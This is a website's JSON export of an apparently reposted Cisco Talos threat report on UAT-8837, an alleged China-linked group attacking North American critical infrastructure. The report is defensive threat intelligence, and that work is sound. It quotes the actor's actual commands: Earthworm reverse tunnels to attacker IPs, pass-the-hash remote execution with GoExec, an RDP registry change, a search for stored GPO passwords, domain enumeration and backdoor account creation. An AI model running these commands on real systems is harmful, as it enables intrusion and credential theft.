{"id":35787,"date":"2026-01-15T06:49:37","date_gmt":"2026-01-15T06:49:37","guid":{"rendered":"http:\/\/localhost\/?p=35787"},"modified":"2026-01-15T06:49:37","modified_gmt":"2026-01-15T06:49:37","slug":"uat-8837-targets-critical-infrastructure-sectors-in-north-america","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35787","title":{"rendered":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-15T12:05:12&#8243;,&#8221;description&#8221;:&#8221;* Cisco Talos is closely tracking UAT-8837, a threat actor that we assess with medium confidence to be a China-nexus advanced persistent threat (APT) actor, based on overlaps in tactics, techniques, and procedures (TTPs) with those of other known China-nexus threat actors.\\n  * Based on UAT-8837&#8217;s TTPs and the post-compromise activity Talos has observed across multiple intrusions, we assess with medium confidence that this actor is primarily tasked with obtaining initial access to high-value organizations.\\n  * Although UAT-8837&#8217;s targeting may appear sporadic, since at least 2025 the group has clearly focused on targets within critical infrastructure sectors in North America.\\n\\n![UAT-8837 targets critical infrastructure sectors in North America](https:\/\/blog.talosintelligence.com\/content\/images\/2026\/01\/threat_spotlight-1.jpg)\\n\\nAfter obtaining initial access &#8212; either by successful exploitation of vulnerable servers or by using compromised credentials &#8212; UAT-8837 predominantly deploys open-source tools to harvest sensitive information such as credentials, security configurations, and domain and Active Directory (AD) information, which it uses to create multiple channels of access to their victims. The threat actor uses a combination of tools in their post-compromise hands-on-keyboard operations, including Earthworm, SharpHound, DWAgent, and Certipy. 
The TTPs, tooling, and remote infrastructure associated with UAT-8837 were also seen in the recent exploitation of CVE-2025-53690, a ViewState deserialization zero-day vulnerability in SiteCore products, indicating that UAT-8837 may have access to zero-day exploits.\\n\\n* * *\\n\\n## Post-compromise actions\\n\\nUAT-8837 can exploit both n-day and zero-day vulnerabilities to gain access to target environments. Most recently, UAT-8837 exploited a ViewState deserialization zero-day vulnerability in SiteCore products, CVE-2025-53690, to obtain initial access.\\n\\nAfter UAT-8837 gains initial access, they begin conducting preliminary reconnaissance, leveraging the following commands:\\n    \\n    \\n    ping google[.]com\\n    tasklist \/svc\\n    netstat -aon -p TCP\\n    whoami\\n    quser\\n    hostname\\n    net user\\n    \\n\\nThe threat actor disables RestrictedAdmin for Remote Desktop Protocol (RDP) to obtain credentials for remoting into other devices:\\n    \\n    \\n    REG ADD HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa \/v DisableRestrictedAdmin \/t REG_DWORD \/d 00000000 \/f\\n    \\n\\nA shell console may subsequently be opened via &#8220;cmd.exe&#8221; to conduct hands-on-keyboard activity on the compromised endpoint. Multiple artifacts are then downloaded to the following directories, which are used extensively for staging:\\n    \\n    \\n    C:\\\\Users\\\\\\u003cuser\\u003e\\\\Desktop\\\\\\n    C:\\\\windows\\\\temp\\\\\\n    C:\\\\windows\\\\public\\\\music\\n    \\n\\n## UAT-8837 tool usage\\n\\nUAT-8837 may use a variety of tooling throughout the course of an intrusion. 
This variation in tooling may be because many of these tools are detected and blocked by most security products, such as Cisco Secure Endpoint (CSE), which often leads the threat actor to cycle through different variants of the tools to find versions that are not detected.\\n\\n### GoTokenTheft\\n\\nThe GoTokenTheft utility is a tool for stealing access tokens. Written in GoLang and deployed at C:\\\\Users\\\\\\u003cuser\\u003e\\\\Desktop\\\\go.exe, it may be used to steal tokens to run commands with elevated privileges:\\n    \\n    \\n    eee.ico REG ADD HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Lsa \/v DisableRestrictedAdmin \/t REG_DWORD \/d 00000000 \/f\\n    \\n\\n### Earthworm\\n\\nEarthworm is a network tunneling tool that has been used extensively by Chinese-speaking threat actors in intrusions to expose internal endpoints to attacker-owned remote infrastructure. UAT-8837 deploys multiple versions of Earthworm to determine which are not detectable by endpoint protection products. 
The undetected version is then used to create a reverse tunnel to attacker-controlled servers, as seen in the commands below:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\v.ico -s rssocks -d 172[.]188[.]162[.]183 -e 1433\\n      \\n    C:\\\\users\\\\public\\\\videos\\\\verr.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\\n      \\n    C:\\\\Windows\\\\Temp\\\\eir.ico -p 8888 -t 172[.]188[.]162[.]183 -f 11112\\n      \\n    cisos.ico -s rssocks -d 172[.]188[.]162[.]183 -e80\\n      \\n    vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 443\\n      \\n    vgent.ico -s rssocks -d 172[.]188[.]162[.]183 -e 447\\n      \\n    abc.ico -s rssocks -d 4[.]144[.]1[.]47 -e 448\\n      \\n    C:\\\\users\\\\public\\\\music\\\\aa.exe -s rssocks -d 74[.]176[.]166[.]174 -e 443\\n      \\n    C:\\\\Users\\\\public\\\\Music\\\\twd.exe -s rssocks -d 20[.]200[.]129[.]75 -e 443\\n    \\n    \\n\\n### DWAgent\\n\\nUAT-8837 deploys DWAgent, a remote administration tool, to make it easier to access the compromised endpoint and drop additional malware on the system:\\n    \\n    \\n    C:\\\\Users\\\\\\\\Downloads\\\\dwagent.exe\\n    \\n    C:\\\\Users\\\\\\\\AppData\\\\Local\\\\Temp\\\\dwagent20250909101732\\\\runtime\\\\dwagent.exe -S -m installer\\n    \\n\\n### SharpHound\\n\\nPer Talos&#8217; observations, UAT-8837 downloads SharpHound to collect Active Directory information:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\SharpHound.exe\\n    \\n\\n### Impacket\\n\\nUAT-8837 makes several attempts to download Impacket-based binaries to use in their operations:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\wec.ico\\n    \\n\\nWhen Impacket is detected and blocked, Invoke-WMIExec is downloaded to run commands with elevated privileges:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\Invoke-WMIExec.ps1\\n    \\n\\n### GoExec\\n\\nIn one intrusion, after cycling through a number of tools, UAT-8837 deployed GoExec, a GoLang-based remote execution tool, to execute 
commands on other connected remote endpoints within the victim&#8217;s network:\\n    \\n    \\n    goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cu\\u003e\/\\u003cp\\u003e -H \\u003chash\\u003e -e 'cmd.exe' -a '\/C hostname \/all' -o-\\n    \\n    C:\\\\Windows\\\\Temp\\\\goe.exe wmi proc 10[.]xx[.]xx[.]xx \\\\\\n    \\n    goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cu\\u003e\/\\u003cp\\u003e --nt-hash \\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n    \\n    goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e --nt-hash \\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n    \\n    goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e --nt-hash 00000000000000000000000000000000:\\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n    \\n    goe.ico dcom mmc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e --nt-hash 00000000000000000000000000000000:\\u003chash\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n    \\n    goe.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C hostname -o 1.txt\\n    \\n    g.ico dcom mmc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C ipconfig -o-\\n    g.ico wmi proc 10[.]xx[.]xx[.]xx -u \\u003cuser\\u003e -p \\u003cpassword\\u003e -e cmd.exe -a \/C hostname -o-\\n    \\n\\nIt is worth noting that the use of GoExec was likely an on-the-fly decision by the operator, necessitated by the constant detection and blocking of the threat actor&#8217;s tooling by CSE.\\n\\nThe threat actor also attempted to download and execute SharpWMI in the compromised environment, which was again detected by CSE:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\s.ico\\n    \\n\\n### Rubeus\\n\\nRubeus, a C#-based toolset for Kerberos abuse, may also be deployed:\\n\\n  * C:\\\\Windows\\\\Temp\\\\r.ico\\n  * C:\\\\Windows\\\\Temp\\\\lo.txt\\n\\n\\n\\n### Certipy\\n\\nUAT-8837 also 
deploys Certipy, a tool for AD discovery and abuse:\\n    \\n    \\n    C:\\\\Windows\\\\Temp\\\\Certipy.exe\\n\\n## Hands-on-keyboard activity\\n\\nUAT-8837 may run a series of commands during the intrusion to obtain sensitive information, such as credentials, from victim organizations:\\n    \\n    \\n    findstr \/S \/l cpassword [\\\\\\\\]\\\\policies\\\\*.xml\\n    \\n\\nThe system&#8217;s security configuration is also exported using secedit:\\n    \\n    \\n    secedit \/export \/cfg C:\\\\windows\\\\temp\\\\pol.txt\\n    \\n\\nWindows local security policies extracted via secedit include password policies, user rights, and audit settings. This information may be valuable to adversaries who seek to evaluate an endpoint&#8217;s security posture, including network security settings.\\n\\nIn one victim organization, UAT-8837 exfiltrated DLL-based shared libraries related to the victim&#8217;s products, raising the possibility that these libraries may be trojanized in the future. This creates opportunities for supply chain compromises and for reverse engineering to find vulnerabilities in those products.\\n\\n### Domain reconnaissance\\n\\nThe net commands typically used to query domain groups and users are:\\n    \\n    \\n    net group domain admins \/domain\\n    \\n    net localgroup administrators \/domain\\n    \\n    net group \\u003cname\\u003e \/domain\\n    \\n    net user \\u003cuser\\u003e \\u003cpassword\\u003e \/domain\\n    \\n    net user \\u003cuser\\u003e \/domain\\n    \\n    net accounts \/domain\\n    \\n    net user \\u003cuser\\u003e \/domain\\n    \\n    nltest \/DCLIST:\\u003cdomain\\u003e\\n    \\n    nslookup \\u003csubdomain\\u003e.\\u003cdomain\\u003e\\n    \\n    \\n\\nThe `setspn` command is used to list and query Service Principal Name (SPN) data from Active Directory:\\n    \\n    \\n    setspn -L \\n    \\n    setspn -Q *\/*\\n    \\n\\n### Active Directory reconnaissance\\n\\nUAT-8837 deploys a combination of tools to 
perform AD reconnaissance in the compromised environment. These tools include SharpHound and Certipy. The threat actor also uses the Windows-native tool &#8220;setspn&#8221; to query for AD data. However, UAT-8837 also brings their own living-off-the-land (LOTL) tooling. In one intrusion, the actor deployed dsget and dsquery to query for specific properties in the AD:\\n    \\n    \\n    dsquery.exe user -limit 0 \\n      \\n    dsquery.exe user -name \\u003cname\\u003e\\n      \\n    dsget user -samid -display -email -upn\\n      \\n    dsget.exe user -samid -display -email -upn\\n      \\n    dsquery.exe user -samid \\u003cid\\u003e \\n      \\n    dsget.exe user -display -email -upn\\n      \\n    dsquery.exe user -name admin\\n      \\n    dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -samid -display -email -upn\\n      \\n    dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -upn\\n      \\n    dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -memberof\\n      \\n    dsget.exe user CN=\\u003cid\\u003e,OU=ServiceAccounts,OU=Production,DC=prod,DC=\\u003cdomain\\u003e,DC=com -disabled\\n      \\n    dsquery * DC=prod,DC=\\u003cdomain\\u003e,DC=com -filter (objectClass=user) -attr * -limit 0\\n    \\n    \\n\\n### Backdoored user accounts\\n\\nThe threat actor created user accounts to open up another channel of access to the compromised environment:\\n    \\n    \\n    net user \\u003cuser\\u003e \\u003cpassword\\u003e \/add \/domain\\n    \\n\\nIn another instance, UAT-8837 added an existing user account to local groups:\\n    \\n    \\n    net user \\u003cuser\\u003e\\n      \\n    net localgroup \\u003cgroup\\u003e \\u003cuser\\u003e \/add\\n    \\n\\n## Coverage\\n\\nThe following ClamAV signature detects and blocks this threat:\\n\\n  * Win.Malware.Earthworm\\n\\n\\n\\nThe following 
Snort Rules (SIDs) detect and block this threat:\\n\\n  * Snort 2 &#8211; 61883, 61884, 63727, 63728\\n  * Snort 3 &#8211; 300585, 63727, 63728\\n\\n\\n\\n## Indicators of compromise (IOCs)\\n\\nThe IOCs for this threat are also available at our GitHub repository here.&#8243;,&#8221;published&#8221;:&#8221;2026-01-15T11:00:47&#8243;,&#8221;modified&#8221;:&#8221;2026-01-15T11:00:47&#8243;,&#8221;type&#8221;:&#8221;talosblog&#8221;,&#8221;title&#8221;:&#8221;UAT-8837 targets critical infrastructure sectors in North 
America&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384&#8243;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-53690&#8243;],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:9,&#8221;severity&#8221;:&#8221;CRITICAL&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:H\/PR:N\/UI:N\/S:C\/C:H\/I:H\/A:H&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/blog.talosintelligence.com\/uat-8837\/&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_
severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-15T12:05:12&#8243;,&#8221;description&#8221;:&#8221;* Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[9,6,8,86,12,13,7,69,11,5],"class_list":["post-35787","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-critical","tag-cve","tag-cvss","tag-cvss-90","tag-exploit","tag-news","tag-security","tag-talosblog","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35787\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-15T12:05:12&#8243;,&#8221;description&#8221;:&#8221;* Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on...\" 
\/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35787\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-15T06:49:37+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384\",\"datePublished\":\"2026-01-15T06:49:37+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787\"},\"wordCount\":2470,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.0\",\"exploit\",\"news\",\"Security\",\"talosblog\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_news\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35787#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787\",\"name\":\"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero 
redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-15T06:49:37+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35787\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35787#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero 
redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35787","og_locale":"en_US","og_type":"article","og_title":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-15T12:05:12&#8243;,&#8221;description&#8221;:&#8221;* Cisco Talos is closely tracking UAT-8837, a threat actor we assess with medium confidence is a China-nexus advanced persistent threat (APT) actor based on...","og_url":"https:\/\/zero.redgem.net\/?p=35787","og_site_name":"zero redgem","article_published_time":"2026-01-15T06:49:37+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. 
reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35787#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35787"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384","datePublished":"2026-01-15T06:49:37+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35787"},"wordCount":2470,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.0","exploit","news","Security","talosblog","tapic","Vulnerability"],"articleSection":["category_news"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35787#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35787","url":"https:\/\/zero.redgem.net\/?p=35787","name":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-15T06:49:37+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35787#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35787"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35787#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"UAT-8837 targets critical infrastructure sectors in North America_TALOSBLOG:E64A149CC624BB734E545E1C7F4A0384"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero 
redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35787","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35787"}],"version-history":[{"count":0,"href":"htt
ps:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35787\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35787"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35787"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35787"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}